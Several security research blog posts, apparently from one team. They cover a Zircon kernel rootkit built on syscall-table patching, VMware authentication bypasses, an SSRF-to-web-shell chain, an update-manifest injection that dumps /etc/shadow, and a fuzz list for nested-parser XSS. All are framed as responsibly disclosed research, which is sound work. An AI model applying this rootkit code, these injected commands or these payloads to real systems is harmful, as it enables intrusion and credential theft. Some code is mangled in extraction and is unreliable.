1. The fake_vtable array is at 0x35aa74aa020 and the pwn() function is at 0x35aa74a80e0
2. fake_vtable[1] is 0x35aa74a80e0 - 0x35aa74aa020 = 0xffffffffffffe0c0. In DownCastDispatcher() this value appears in DWORD PTR [rax+0x8]
3. After Zircon executes the movsxd r11, DWORD PTR [rax+0x8], the r11 register stores 0xffffffffffffe0c0
4. Adding rax with 0x35aa74aa020 to r11 gives 0x35aa74a80e0, which is the exact address of pwn()
5. So when Zircon calls __x86_indirect_thunk_r11 the control flow goes to the pwn() function of the exploit.

## What to hack in Fuchsia?

After achieving arbitrary code execution in the Zircon kernelspace, I started to think about what to attack with it.

My first thought was to forge a fake ZX_RSRC_KIND_ROOT superpower resource, which I had previously seen in zx_debuglog_create(). But I didn’t manage to engineer privilege escalation using ZX_RSRC_KIND_ROOT, because this resource is not used that much in the Fuchsia source code.

Knowing that Zircon is a microkernel, I realized that privilege escalation requires attacking the inter-process communication (IPC) that goes through the microkernel. In other words, I needed to use arbitrary code execution in Zircon to hijack the IPC between Fuchsia userspace components, for example, between my unprivileged exploit component and some privileged entity like the Component Manager.

I returned to studying the Fuchsia userspace, which was messy and boring… But suddenly I got an idea:

What about planting a rootkit into Zircon?

That looked much more interesting, so I switched to investigating how Zircon syscalls work.

## Fuchsia syscalls

The life of a Fuchsia syscall is briefly described in the documentation. Like the Linux kernel, Zircon also has a syscall table. On x86_64, Zircon defines the x86_syscall() function in fuchsia/zircon/kernel/arch/x86/syscall.S, which has the following code (I removed the comments):

    cmp     $ZX_SYS_COUNT, %rax jae .Lunknown_syscall leaq .Lcall_wrapper_table(%rip), %r11 movq (%r11,%rax,8), %r11 lfence jmp *%r11 Here’s how this code looks in the debugger:  0xffffffff00306fc8 <+56>: cmp rax,0xb0 0xffffffff00306fce <+62>: jae 0xffffffff00306fe1 <x86_syscall+81> 0xffffffff00306fd0 <+64>: lea r11,[rip+0xbda21] # 0xffffffff003c49f8 0xffffffff00306fd7 <+71>: mov r11,QWORD PTR [r11+rax*8] 0xffffffff00306fdb <+75>: lfence 0xffffffff00306fde <+78>: jmp r11 Aha, it shows that the syscall table is at 0xffffffff003c49f8. Let’s see the contents: (gdb) x/10xg 0xffffffff003c49f8 0xffffffff003c49f8: 0xffffffff00307040 0xffffffff00307050 0xffffffff003c4a08: 0xffffffff00307070 0xffffffff00307080 0xffffffff003c4a18: 0xffffffff00307090 0xffffffff003070b0 0xffffffff003c4a28: 0xffffffff003070d0 0xffffffff003070f0 0xffffffff003c4a38: 0xffffffff00307110 0xffffffff00307130$ disassemble 0xffffffff00307040
Dump of assembler code for function x86_syscall_call_bti_create:
0xffffffff00307040 <+0>:    mov    r8,rcx
0xffffffff00307043 <+3>:    mov    rcx,r10
...

Here the first address 0xffffffff00307040 in the syscall table points to the x86_syscall_call_bti_create() function. It is system call number zero, which is defined in the auto-generated file kernel-wrappers.inc in the gen/zircon/vdso/include/lib/syscalls/ directory. And the last syscall there is x86_syscall_call_vmo_create_physical() at 0xffffffff00307d10, which is number 175 (see ZX_SYS_COUNT defined as 176). Showing the whole syscall table plus a bit more:

(gdb) x/178xg 0xffffffff003c49f8
0xffffffff003c49f8:    0xffffffff00307040  0xffffffff00307050
0xffffffff003c4a08:    0xffffffff00307070  0xffffffff00307080
0xffffffff003c4a18:    0xffffffff00307090  0xffffffff003070b0
...
0xffffffff003c4f58:    0xffffffff00307ce0  0xffffffff00307cf0
0xffffffff003c4f68:    0xffffffff00307d00  0xffffffff00307d10
0xffffffff003c4f78 <_ZN6cpu_idL21kTestDataCorei5_6260UE>:    0x0300010300000300  0x0004030003030002

Yes, the function pointer 0xffffffff00307d10 of the last syscall is right at the end of the syscall table. That knowledge was enough for my experiments with a rootkit.

## Planting a rootkit into Zircon

As a first experiment, I overwrote the whole syscall table with 0x41 in my pwn() function. As I mentioned, this function is executed as a result of control-flow hijacking in Zircon. For overwriting the read-only syscall table, I used the old-school classic of changing the WP bit in the CR0 register:

#define SYSCALL_TABLE 0xffffffff003c49f8
#define SYSCALL_COUNT 176

int pwn(void)
{

cr0_value = cr0_value & (~0x10000); // Set WP flag to 0

write_cr0(cr0_value);

memset((void *)SYSCALL_TABLE, 0x41, sizeof(unsigned long) * SYSCALL_COUNT);
}

The CR0 helpers:

void write_cr0(unsigned long value)
{
__asm__ volatile("mov %0, %%cr0" : : "r"(value));
}

{
unsigned long value;
__asm__ volatile("mov %%cr0, %0" : "=r"(value));
return value;
}

The result:

(gdb) x/178xg 0xffffffff003c49f8
0xffffffff003c49f8:    0x4141414141414141  0x4141414141414141
0xffffffff003c4a08:    0x4141414141414141  0x4141414141414141
0xffffffff003c4a18:    0x4141414141414141  0x4141414141414141
...
0xffffffff003c4f58:    0x4141414141414141  0x4141414141414141
0xffffffff003c4f68:    0x4141414141414141  0x4141414141414141
0xffffffff003c4f78 <_ZN6cpu_idL21kTestDataCorei5_6260UE>:    0x0300010300000300  0x0004030003030002

Good. Then I started to think about how to hijack the Zircon syscalls. Doing that similarly to the Linux kernel rootkits was not possible: a usual Linux rootkit is a kernel module that provides hooks as functions from that particular module in the kernelspace. But in my case, I was trying to plant a rootkit from the userspace exploit into the microkernel. Implementing the rootkit hooks as userspace functions in the exploit process context could not work.

So I decided to turn some kernel code from Zircon into my rootkit hooks. My first candidate for overwriting was the assert_fail_msg() function, which drove me nuts during exploit development. That function was big enough, so I had a lot of space to place my hook payload.

I wrote my rootkit hook for the zx_process_create() syscall in C, but didn’t like the assembly of that hook generated by the compiler. So I reimplemented it in asm. Let’s look at the code, I like this part:

#define XSTR(A) STR(A)
#define STR(A) #A

#define ZIRCON_ASSERT_FAIL_MSG 0xffffffff001012e0
#define HOOK_CODE_SIZE 60
#define ZIRCON_PRINTF 0xffffffff0010fa20
#define ZIRCON_X86_SYSCALL_CALL_PROCESS_CREATE 0xffffffff003077c0

void process_create_hook(void)
{
__asm__ ( "push %rax;"
"push %rdi;"
"push %rsi;"
"push %rdx;"
"push %rcx;"
"push %r8;"
"push %r9;"
"push %r10;"
"xor %al, %al;"
"mov $" XSTR(ZIRCON_ASSERT_FAIL_MSG + 1 + HOOK_CODE_SIZE) ",%rdi;" "mov$" XSTR(ZIRCON_PRINTF) ",%r11;"
"callq *%r11;"
"pop %r10;"
"pop %r9;"
"pop %r8;"
"pop %rcx;"
"pop %rdx;"
"pop %rsi;"
"pop %rdi;"
"pop %rax;"
"mov $" XSTR(ZIRCON_X86_SYSCALL_CALL_PROCESS_CREATE) ",%r11;" "jmpq *%r11;"); } 1. This hook saves (pushes to the stack) all the registers that can be clobbered by the subsequent function calls. 2. Then I prepare and call the Zircon printf() kernel function: • The first argument of this function is provided via the rdi register. It stores the address of the string that I want to print to the kernel log. More details on this will come later. The trick with STR and XSTR macros is used for the stringizing; you can read about it in the GCC documentation. • Zero al indicates that no vector arguments are passed to this function with a variable number of arguments. • The r11 register stores the address of the Zircon printf() function, which is called by the callq *%r11 instruction. 3. After calling the kernel printf(), the clobbered registers are restored. 4. Finally, the hooked jumps to the original syscall zx_process_create(). And now the most interesting part: the rootkit planting. The pwn() function copies the code of the hook from the exploit binary into the Zircon kernel code at the address of assert_fail_msg(). #define ZIRCON_ASSERT_FAIL_MSG 0xffffffff001012e0 #define HOOK_CODE_OFFSET 4 #define HOOK_CODE_SIZE 60 char *hook_addr = (char *)ZIRCON_ASSERT_FAIL_MSG; hook_addr[0] = 0xc3; // ret to avoid assert hook_addr++; memcpy(hook_addr, (char *)process_create_hook + HOOK_CODE_OFFSET, HOOK_CODE_SIZE); hook_addr += HOOK_CODE_SIZE; const char *pwn_msg = "ROOTKIT HOOK: syscall 102 process_create()\n"; strncpy(hook_addr, pwn_msg, strlen(pwn_msg) + 1); #define SYSCALL_N_PROCESS_CREATE 102 #define SYSCALL_TABLE 0xffffffff003c49f8 unsigned long *syscall_table_item = (unsigned long *)SYSCALL_TABLE; syscall_table_item[SYSCALL_N_PROCESS_CREATE] = (unsigned long)ZIRCON_ASSERT_FAIL_MSG + 1; // after ret return 42; // don't pass the type check in DownCastDispatcher 1. hook_addr is initialized with the address of the assert_fail_msg() kernel function. 2. The first byte of this function is overwritten with 0xc3, which is the ret instruction. I do that to skip the Zircon crashes on assertions; now the assertion handling returns immediately. 3. The exploit copies the code of my rootkit hook for the zx_process_create() syscall to the kernelspace. I described process_create_hook() above. 4. The exploit copies the message string that I want to print on every zx_process_create() syscall. The hook will execute mov$" XSTR(ZIRCON_ASSERT_FAIL_MSG + 1 + HOOK_CODE_SIZE) ",%rdi, and the address of this string will get into rdi. Now you see why I added 1 byte to this address: it’s for the additional ret instruction at the beginning of assert_fail_msg().
5. The address of the hook ZIRCON_ASSERT_FAIL_MSG + 1 is written to the syscall table, item number 102, which is for the zx_process_create() syscall handler.
6. Finally, the pwn() exploit function returns 42. As I mentioned, Zircon uses my fake vtable and executes this function instead of the TimerDispatcher.get_type() method. The original get_type() method of this kernel object returns 16 to pass the type check and proceed handling. And here I return 42 to fail this check and finish the zx_timer_cancel() system call, which hit use-after-free.

Ok, the rootkit is now planted into the Zircon microkernel of Fuchsia OS!

## Exploit demo

I implemented a similar rootkit hook for the zx_process_exit() syscall at the place of the assert_fail() kernel function. So the rootkit prints the messages to the kernel log upon process creation and exiting. See the exploit demo:

## Conclusion

That’s how I came across Fuchsia OS and its Zircon microkernel. This work was a refreshing experience for me. I’d wanted to try my kernel-hacking skills on this interesting OS for a long time ever since I heard about it at the Linux Security Summit 2018 in Vancouver. So I’m glad of this research.

In this article, I gave an overview of the Fuchsia operating system, its security architecture, and the kernel development workflow. I assessed it from the attacker’s perspective and shared the results of my exploit development experiments for the Zircon microkernel. I followed the responsible disclosure process for the Fuchsia security issues discovered during this research.

This is one of the first public researches on Fuchsia OS security. I believe this article will be useful for the OS security community, since it spotlights practical aspects of microkernel vulnerability exploitation and defense. I hope that my work will inspire you too to do kernel hacking. Thanks for reading!

# Catching bugs in VMware: Carbon Black Cloud Workload Appliance and vRealize Operations Manager

25 February 2022 at 11:23

Last year we found a lot of exciting vulnerabilities in VMware products. The vendor was notified and they have since been patched. This is the second part of our research. This article covers an Authentication Bypass in VMware Carbon Black Cloud Workload Appliance (CVE-2021-21978) and an exploit chain in VMware vRealize Operations (CVE-2021-21975, CVE-2021-22023, CVE-2021-21983) which led to Remote Code Execution.

## VMware Carbon Black Cloud Workload Appliance

Our story begins with a vulnerability in the VMware Carbon Black Cloud Workload Appliance, where we managed to bypass the authentication mechanism and gain access to the administrative console.

The appliance is hosted on-premise and is the link between an organization’s infrastructure and VMware Carbon Black Cloud, which is endpoint protection platform.

By checking the ports available on 0.0.0.0 using the netstat command, we found a web-application on port 443.

The front-end server was an Envoy proxy server. Upon looking into its configuration file, we determined that further requests are proxied to tomcat-based microservices.

Excerpt from config /opt/vmware/cwp/appliance-gateway/conf/cwp-appliance-gateway.yaml:

node:
cluster: cwp_appliance
id: cwp-appliance-v1-2020
static_resources:
clusters:
-
connect_timeout: 5s
hosts:
-
port_value: 3030
lb_policy: round_robin
name: service_vsw
type: LOGICAL_DNS
-
connect_timeout: 5s
hosts:
-
port_value: 3020
lb_policy: round_robin
name: service_apw
type: LOGICAL_DNS
-
connect_timeout: 5s
hosts:
-
port_value: 3010
lb_policy: round_robin
name: service_acs
type: LOGICAL_DNS


After studying the application.yml configuration file for the service, which is called service_acs and runs on port 3010, we found that a role-based access model from the Java Spring framework is implemented.

// application.yml
rbacpolicy:
role:
- name: SERVICE_USER
default: DENY
permissions:
- '*:*'

- name: APPLIANCE_USER
default: DENY
permissions:
- 'acs:getToken'
- 'acs:getServiceToken'
- 'apw:getApplianceDetails'
- 'apw:getApplianceSettings'
- 'apw:getNetworkConf'
…

A cursory examination of the role policy raises many questions:

• What is a service user?
• Why does it have unlimited capabilities?
• What does the getServiceToken API method do?

We decided to start by exploring the getServiceToken API method. Opening the source code, we studied the description of this method. “Generate JWT Token for Service Request” meaning that every time an application needs authentication for an internal API method call, it accesses this API and receives an authorization token.

An excerpt from TokenGeneratorApi.java:

@ApiOperation(
value = "Generate JWT Token for Service Request",
nickname = "getServiceToken",
notes = "",
response = AccessTokenDTO.class,
tags = {"TokenGenerator"}
)
@ApiResponses({@ApiResponse(
code = 200,
message = "OK",
response = AccessTokenDTO.class
…
@RequestMapping(
value = {"/api/v1/service-token/{serviceName}"},
produces = {"application/json"},
method = {RequestMethod.GET}
)
ResponseEntity<AccessTokenDTO> getServiceToken(@ApiParam(value = "name of the service which is requesting token",required = true) @PathVariable("serviceName") String serviceName);


Let’s try to get the authorization token by accessing the service that is attached to port 3010 from the internal network.

We got a JWT token, which turns out to be for the role of our old friend, the service user.

Decoding of the JWT token payload:

{
"sub": "any-service",
"iss": "user-service",
"nbf": 1645303446,
"exp": 1731703446,
"policy": {
"role": "SERVICE_USER",
"permissions": {
"*": [
"*"
]
}
},
"refreshable": false,
"iat": 1645303446
}


The prospect of being able to generate a token for a super-user without authentication looks very tempting. Let’s try to do the same trick, but this time externally, through the Envoy server.

We failed, although the other API methods of the Java service were available to us. Let’s see how proxying to internal services is organized and study the mechanisms that are responsible for routing.

When using the Envoy proxy server as a front-end server, the routing table can be generated dynamically using the Route Discovery API. To do this, inside the backend service, use DiscoveryRequest and others entities from the io.envoyproxy.envoy.api package to describe the configuration of routes.

An example of creating a /admin/ router using Envoy API:

public String routeDiscovery(final DiscoveryRequest discoveryRequest) {
...
VirtualHost virtualHost = virtualHostOrBuilder.build();
String response = null;
...
try {
response = JsonFormat.printer().usingTypeRegistry(typeRegistry).print(discoveryResponse);
} catch (InvalidProtocolBufferException err) {
log.error("Error while serializing response", err);
}

return response;
}


Let’s consider a specific example from the Java service.

An excerpt from EnvoyXDSServiceImpl.java:

package com.vmware.cwp.appliance.applianceworker.service.impl;

@Component
public class EnvoyXDSServiceImpl implements EnvoyXDSService {
...
public String routeDiscovery(final DiscoveryRequest discoveryRequest) {
...
Route service_token_block = Route.newBuilder()
.setMatch(RouteMatch.newBuilder()
.setPrefix("/acs/api/v1/service-token").build())
.setRoute(RouteAction.newBuilder().setCluster("service_vsw")
.setPrefixRewrite("/no_cloud").build()).build();

...
Route acs = Route.newBuilder()
.setMatch(RouteMatch.newBuilder()
.setPrefix("/acs/").build())
.setRoute(RouteAction.newBuilder()
.setCluster("service_acs")
...


We see that when we encounter the URL /acs/api/v1/service-token, the application forwards the request to the stub page, instead of passing the request onto the service for processing. At the same time, any URL prefixed with /acs/* will be forwarded to the backend. Our task is to bypass the blacklist and pass the whitelist conditions. A special feature of the Envoy server is required to allow us to do that. We read the documentation and found one interesting point: the Envoy server has disabled normalization by default.

Despite the recommendations of the Envoy developers not to forget to enable this property when working with RBAC filters, the default value often remains unchanged, as it is in this case. Disabled normalization means that URL /acs/api/v1/service-token/rand and /acs/api/v1/%73ervice-token/rand will be treated by Envoy API as non-identical strings, although after normalization by another server, such as tomcat, the urls will be treated as identical again.

It turns out that if we change at least one character in the API-method name to its URL representation, we can bypass the blacklist without violating the whitelist conditions.

We send a modified request and receive a service token.

Done. We now have a service token with super-user privileges, which grants us administrator powers over this software.

## VMware vRealize Operations Manager

In the next story we will tell you about the chain of vulnerabilities found in automation software.

### Server-Side Request Forgery

We started by investigating the Operations Manager API , and found a couple of methods available without authentication. These included the API-method /casa/nodes/thumbprints, which takes an address as a user parameter. By specifying the address of a remote server under our control as the parameter in HTTP request we receive a GET request from the Operations Manager instance with the URL-path /casa/node/thumbprint.

To control the URL-path completely, we can add the “?” symbol to cut off the path normally concatenated to by the application. Let’s send a request with a custom path:

As a result, we were able to make any GET request on behalf of the application, including to internal resources.

Having been able to make a GET request to internal resources, we tried to make a request to some API methods that are available only to an authorized user. So, for example, we got access to the API method for synchronizing passwords between nodes. When calling this method, we get the password hash of the administrator in two different hashing algorithms – sha256 and sha512.

It is worth saying that the sha family of algorithms is not recommended for password hashing and can be cracked with high chances of success. And since the administrator in the application corresponds to the system admin user on server, if there is a ssh server in the system with a keyless mode of operation, you can connect to the server and gain access to the command shell. To store sensitive data such as a password, it is best practice to use so-called slow hash functions.

### Credentials Leak

Despite the high probability of gaining shell access at this stage, the above method is not fully guaranteed and so we have continued our research. It is worth noting how, using SSRF, we gain access to API methods that require authentication. We know of several mechanisms that could provide this functionality and, in this case, not the best approach was chosen. The fact is that every time the API is accessed by the application, it adds a basic authentication header to the request. To extract the credentials from the header, we sent an SSRF request to our remote sniffer, which in response outputs the contents of the http request:

It appears that the application uses the maintenanceAdmin user to access the API. Let’s try to use these credentials to access the protected API methods directly, without SSRF.

Well, now that we have super-user privileges, we’re only one step from taking control of the server. After looking through all the API methods, we found two ways to access the shell.

The first and rough approach involves resetting the password for the administrative user using the PUT /casa/os/slice/user API method. This method allows you to change the password for users without additional verification, such as the current password. Since the admin user of the same name exists in the system, it is not hard to connect to the system with its account via SSH.

If SSH is disabled, simply enable it using one of the API methods.

### RCE (Path Traversal)

The previous approach involved resetting the administrator password, which can disrupt the customer’s workflow when pentesting. As an alternative approach, we found a way to load a web shell via a path-traversal attack using the /casa/private/config/slice/ha/certificate API method. A lightweight JSP-shell uploaded to the web directory of the server will be used as the web shell.

After uploading, we access the shell at https://vROps.host/casa/webshell.jsp, passing the command in the cmd parameter.

## Outro

Thank you for reading this article to the end. We hope you were able to find something useful from our research. Whether you are a developer, a researcher or maybe even the head of PSIRT.

We also would like to highlight that this research resulted in 9 CVEs of varying severities, and each report was handled with the utmost care by the VMware Security Response Center team. We appreciate VMware for such cooperation.

# Hunting for bugs in VMware: View Planner and vRealize Business for Cloud

15 February 2022 at 14:06

Last year we found a lot of exciting vulnerabilities in VMware products. They were disclosed to the vendor, responsibly and have been patched. It’ll be a couple of articles, that disclose the details of the most critical flaws. This article covers unauthenticated RCEs in VMware View Planner (CVE-2021-21978) and in VMware vRealize Business for Cloud (CVE-2021-21984).

We want to thank VMware and their security response center for responsible cooperation. During the collaboration and communication, we figured out, that the main goal of their approach to take care of their customers and users.

## VMware View Planner

VMware View Planner is the first comprehensive standard methodology for comparing virtual desktop deployment platforms. Using the patented technology, View Planner generates a realistic measure of client-side desktop performance for all desktops being measured on the virtual desktop platform. View Planner uses a rich set of commonly used applications as the desktop workload.

VMware View Planner Documentation

After deploying this system, users access the web management interface at ports 80 and 443.

We started our investigation using the netstat -pltn command to identify the process assigned to port TCP/443. As shown below, we found this to be the docker’s process:

To get a list of all the docker containers and the ports each one forwarded to the host machine we ran the docker ps command:

Ports 80 and 443 was forwarded from the appacheServer container. Next, we attempted to get a shell inside of the container in order to find out the exact application that handles the HTTP requests. As shown below this turned out to be the httpd server:

The configuration file for the httpd server httpd.conf was located in the directory /etc/httpd/conf/. An extract of the configuration file is show below:

<Directory "/etc/httpd/cgi-bin">
AllowOverride None
Options None
Require all granted
</Directory>

# WSGI configuration for log uplaod

#
# Avoid passing HTTP_PROXY environment to CGI's on this or any proxied
# backend servers which have lingering "httpoxy" defects.
# 'Proxy' request header is undefined by the IETF, not listed by IANA
#
</IfModule>

The line with the WSGIScriptAlias directive caught our attention. That directive points to the python script log_upload_wsgl.py which responsible for handling requests to the /logupload URL. Significantly, authentication is not required in order to execute this request.

We determined:

1. VMware View Planner handles a request to the /logupload URL made to the 443/TCP port.
2. The request is redirected from the host into the appacheServer docker container.
3. The Apache HTTP Server’ service (httpd) handles the requests to the mentioned URL inside the container by executing the log_upload_wsgl.py python script.

We immediately started analysis of the log_upload_wsgi.py script. The script is very small and lightweight. A summary of this script’s functions:

1. The script handles HTTP POST requests.
2. The script parses a data from request.
3. The script creates a file with the pathname based on the unsanitized data from the request and static prefix.
4. Finally, the script writes the POST content into that file.
#...
if environ['REQUEST_METHOD'] == 'POST':
#...
resultBasePath = "/etc/httpd/html/vpresults"
try:
filedata = post["logfile"]

if not os.path.exists(os.path.join(resultBasePath, logFileJson.itrLogPath)):
os.makedirs(os.path.join(resultBasePath, logFileJson.itrLogPath))

if filedata.file:
else:
filePath = os.path.join(resultBasePath, logFileJson.itrLogPath, logFileJson.logFileType)
with open(filePath, 'wb') as output_file:
while True:
# End of file
if not data:
break
output_file.write(data)

#...

We were surprised at user data wasn’t filtering. This means we could create arbitrary file with arbitrary content using a Path Traversal or uncommon feature of the os.path.join function.

We want to draw attention to the unsafe use of os.path.join function in some cases. Even if the user input has been sanitized and the “..” strings would be stripped to prevent the Path Traversal, it’s possible to use the absolute path to the desired directory in the second argument.

Often even if there are possibilities to upload a malicious file for getting an arbitrary remote code execution python web app needs to be restarted entirely to pick up this new code. Unfortunately for VMware, this time, the WSGIScriptAlias alias in the httpd’s config meant that the script would not be cached and would be loaded into memory and executed each time users request the /logupload URL.

With this in mind, we decided to overwrite the original log_upload_wsgi.py script with our own malicious code. We had only one attempt to upload a valid python script otherwise we would break the web app. We created a WSGI web shell in the python language and tried to upload it to the /etc/httpd/html/wsgi_log_upload/ folder with log_upload_wsgi.py filename.

The attempt was successful and we uploaded the file. For the PoC we executed the whoami command sending an HTTP request to /logupload path with GET parameter cmd. Finally, we got the current system user in the server’s response, it was apache user.

## VMware vRealize Business for Cloud

VMware vRealize Business for Cloud automates cloud costing analysis, consumption metering, cloud comparison and planning, delivering the cost visibility and business insights you need to run your cloud more efficiently.

VMware vRealize Business for Cloud Documentation

The second vulnerability in this article affects software, which works alongside with the cloud services. During the assessment, we discovered the application update mechanism is accessible without any authentication. Exploiting this feature resulted in arbitrary code execution on the target system.

It is no secret that if the attacker gets access to software update functionality and can affect the installation process, that would lead to critical consequences for the system. In this case, the update mechanism allowed for the setting up of custom repositories for the package sources. Although this method gives more flexibility to the administrator as they can choose the package location themselves, it exploitation easier for attackers.

At first, we looked closely at the script upgradeVrb.py located in the directory /opt/vmware/share/htdocs/service/administration/ and responsible for the upgrade functionality. It was found that it is available without authentication, and also accepts the repository_url parameter.

The fragment of the vulnerable code upgradeVrb.py:

app = Router()
repository_type = routing.get_query_parameter('repository_type')  # default, cdrom, url
# default is when no provider-runtime.xml is supplied
try:
except:
pass

url = ''
if repository_type == 'cdrom':
url = 'cdrom://'
elif repository_type == 'url':
url = routing.get_query_parameter('repository_url')
if not url:
cgiutil.error('repository_url is needed')
elif repository_type == 'default':


By specifying the address of the remote server controlled by us in the repository_url parameter, we noticed in logs, that the application requested the manifest-latest.xml file.

So, after spending a little time in documentation we figured out that file manifest-latest.xml is a protagonist in repository. The custom repository consists of packages, additional resources and the manifest. The manifest file is a core component for each repository, and it describes the exact steps of the updating process. The repository can be located on any web server as a set of files and folders, but it must meet the specification.

At the next step an example of the correct manifest file for this software was found.

<?xml version="1.0"?>
<version>7.6.0.28529</version>
<fullVersion>7.6.0.28529 Build 13134973</fullVersion>
<vendor>VMware</vendor>
<vendorUUID>706ee0c0-b51c-11de-8a39-0800200c9a66</vendorUUID>
<productRID>a1ba78af-ec67-4333-8e25-a4be022f97c7</productRID>
<vendorURL/>
<productURL/>
<supportURL/>
<releaseDate>20190403115019.000000+000</releaseDate>
<EULAList showPolicy="" introducedVersion=""/>
<UpdateInfoList>
<UpdateInfo introduced-version="7.8" category="feature" severity="important" affected-versions="" description="" reference-type="vendor" reference-id="" reference-url=""/>
</UpdateInfoList>
<preInstallScript>
#!/bin/sh
exit 0
</preInstallScript>
<postInstallScript>
#!/bin/sh
exit 0
</postInstallScript>
<Network protocols="IPv4,IPv6"/>
</update>


While examining the manifest file, the document elements called preInstallScript and postInstallScript caught our attention:

<preInstallScript>
#!/bin/sh
exit 0
</preInstallScript>
<postInstallScript>
#!/bin/sh
exit 0
</postInstallScript>

The content of these elements hints that they are responsible for the OS command that would be executed before and after the update, the perfect place to inject the malicious code.

The updating procedure consists of three steps:

1. Setting up the location of the remote repository
2. Version comparison between the installed version and the version in the repository
3. Remote installation procedure

We changed the version number in our repository and added the payload – the cat /etc/shadow > /opt/vmware/share/htdocs/shadow command that will end up with a sensitive file being written to the publicly available directory:

<?xml version="1.0"?>
<version>7.8.4.28529</version>
<fullVersion>7.8.4.28529 Build 13134973</fullVersion>
<vendor>VMware</vendor>
….
<preInstallScript>
#!/bin/sh
exit 0
</preInstallScript>
<postInstallScript>
#!/bin/sh
exit 0
</postInstallScript>
<Network protocols="IPv4,IPv6"/>
</update>


As it turned out, there is integrity checks on the system. VMware product checks the manifest-latest.xml.sig file that should contain the digital signature of the package. And that is why our first attempt failed:

So, this attempt was unsuccessful. But a quick search on the Internet reveals that this step is not mandatory and can be skipped by setting the validateSignature property to False in the provider-runtime.xml, which stores repository url. To do that, we would need another hack.  Let’s look again how the upgradeVrb.py generates the provider-runtime.xml.

    elif repository_type == 'url':
url = routing.get_query_parameter('repository_url')
if not url:
cgiutil.error('repository_url is needed')
elif repository_type == 'default':

if url:
with open("/opt/vmware/var/lib/vami/update/provider/provider-runtime.xml", 'w') as provider_file:
provider_file.write("""
<service>
<properties>
</properties>
</service>
""" % url)


As you can see, the repository_url parameter is taken from the user input without sanitization. That means we can inject the validateSignature XML tag via user-controlled parameter, which should disable the integrity checks:

With the integrity check disabled, we attempted our attack again using the update process.

The update functionality abuse is successful and we are able to get a copy of the /etc/shadow file available from the web directory without any authentication:

## To be continued

Don’t worry, it’s not over yet. In the next article, we will talk about the SSRF to RCE vulnerability chain and a misconfiguration in a fancy proxy server that led to a severe consequence. Stay tuned!

# Fuzzing for XSS via nested parsers condition

29 December 2021 at 13:58

When communicating online, we constantly use emoticons and put text in bold. Some of us encounter markdown on Telegram or GitHub, while forum-dwellers might be more familiar with BBCode.

All this is made possible by parsers, which find a special string (code/tag/character) in messages and convert it into beautiful text using HTML. And as we know, wherever there is HTML, there can be XSS.

This article reveals our novel technique for finding sanitization issues that could lead to XSS attacks. We show how to fuzz and detect issues in the HTML parsers with nested conditions. This technique allowed us to find a bunch of vulnerabilities in the popular products that no one had noticed before.

The technique was presented at Power Of Community 2021.

## Parsers

### What are parsers, and what are they for in messages?

Parsers are applications that find a substring in a text. When parsing messages, they can find a substring and convert it to the correct HTML code.

## Well known parsers in messages

### HTML as message markup

Some known applications allow using whitelisted HTML tags like <b>, <u>, <img> (WordPress, Vanilla forums, etc.). It is very easy for developers without the hacker’s mentality to overlook some possibilities whilst sanitizing these tags. That is why we think that allowing even a limited list of tags is one of the developers’ worst choices.

### BBcode

BBcode is a lightweight markup language used to format messages in many Internet forums, first introduced in 1998. There’re a few examples of the BBCode and the corresponding HTML code:

### Markdown

Markdown is a lightweight markup language for creating formatted text using a plain-text editor. It was first introduced in 2004. A few other examples:

### AsciiDoc

AsciiDoc is a human-readable document format semantically equivalent to DocBook XML but uses plain-text markup conventions introduced in 2002:

### reStructuredText

reStructuredText (RST, ReST, or reST) is a file format for textual data used primarily in the Python programming language community for technical documentation. First introduced in 2002:

### Other well-known parsers

In addition to text markup parsers in messages and comments, you can also find URL and email parsers, smart URL parsers, which understand and transform to HTML not only HTTP links but also images or YouTube links. Also, you can find emoticons and emojis that become pictures from text, links to the user profile and hashtags that become clickable:

## What do we know about bugs in this functionality?

If you google “markdown XSS”, you will find examples with missing sanitization of HTML characters and URL schemes. Let’s start with them.

### Missing HTML characters sanitization

There is a vulnerability when a parser converts user input to HTML and at the same time does not sanitize HTML characters. It could affect characters such as angle brackets < (0x3c) that are responsible for opening new HTML tags and quotes " (0x22), ' (0x27) which are responsible for the beginning and the end of an HTML attribute:

### Missing “javascript:” URL scheme sanitization

This vulnerability can be exploited when a parser converts user input that contains URLs. If such parsers do not sanitize the “javascript:” URL scheme, it will allow the attacker to execute arbitrary JavaScript and perform XSS attacks:

### Missing “file:” URL scheme sanitization

This is another vulnerability when a parser converts user input that contains URLs. This time the cause is insufficient “file://” URL scheme sanitization. This vulnerability could lead to critical attacks against desktop applications. For example, arbitrary client-side file reading using JavaScript, arbitrary client-side file execution using plain HTML, leakage of NTLM hashes. They could be used for the “pass the hash” or offline password brute force attacks against Windows users:

### Decoding after sanitization

Vulnerability when a parser converts user input to HTML, sanitizes HTML characters, but after it decodes user input from known encoding. HTML related encoding could be an urlencode " – (%22) or HTML entities transformation " – (&quote;/&#x22;/&#34;)

## Parsers with nested conditions’

Nested condition is when one payload is processed by two different parsers, which, with some manipulations, allows us to inject arbitrary JavaScript into the page. These vulnerabilities are very easy to overlook both by developers and hackers.

However, we found this type of bug you can easily find by fuzzing!

Here is a PHP code sample of a vulnerable application:

<?php
function returnCLickable($input) {$input = preg_replace('/(http|https|files):\/\/[^\s]*/', '<a href="${0}">${0}</a>', $input);$input = preg_replace('/([a-zA-Z0-9._-][email protected][a-zA-Z0-9._-]+\.[a-zA-Z0-9_-]+)(\?\w*=[^\s]*|)/', '<a href="mailto:${0}">${0}</a>', $input);$input = preg_replace('/\n/', '<br>', $input); return$input . "\n\n";
}
$message = returnCLickable(htmlspecialchars($_REQUEST['msg']));
?>



User input passed as a sanitized text to the argument of function returnClickable that finds urls and emails and returns HTML code for clickable elements.

Looks safe at first, but if you try to send a string that contains an email inside the URL, the parser will return broken HTML code, and your user input migrates from an HTML attribute value to an HTML attribute name.

## Fuzzlist building logic

For better understanding, we will show you an example with vBulletin. Here is a fuzz-list fragment to discover XSS via nested parsers. The vulnerable BBcode tag is [video], and the tag that allows us to insert new HTML attributes is [font]:

[img]http://aaa.ru/img/header.jpg[font=qwe]qwe[/font]qwe[/img]
[VIDEO="qwe[font=qwe]qwe[/font];123"]qwe[/VIDEO]
[VIDEO="qwe;123"]qw[font=qwe]qwe[/font]e[/VIDEO]
[video=twitch;123]https://www.twitch.tv/videos/285048327?collection=-41EjFuwRRWdeQ[font=qwe]qwe[/font][/video]
[video=vimeo;123]https://vimeo.com/channels/staffpicks/285359780[font=qwe]qwe[/font][/video]
[video=metacafe;123]http://www.metacafe.com/watch/11718542/you-got-those-red-buns-hun/[font=qwe]qwe[/font][/video]
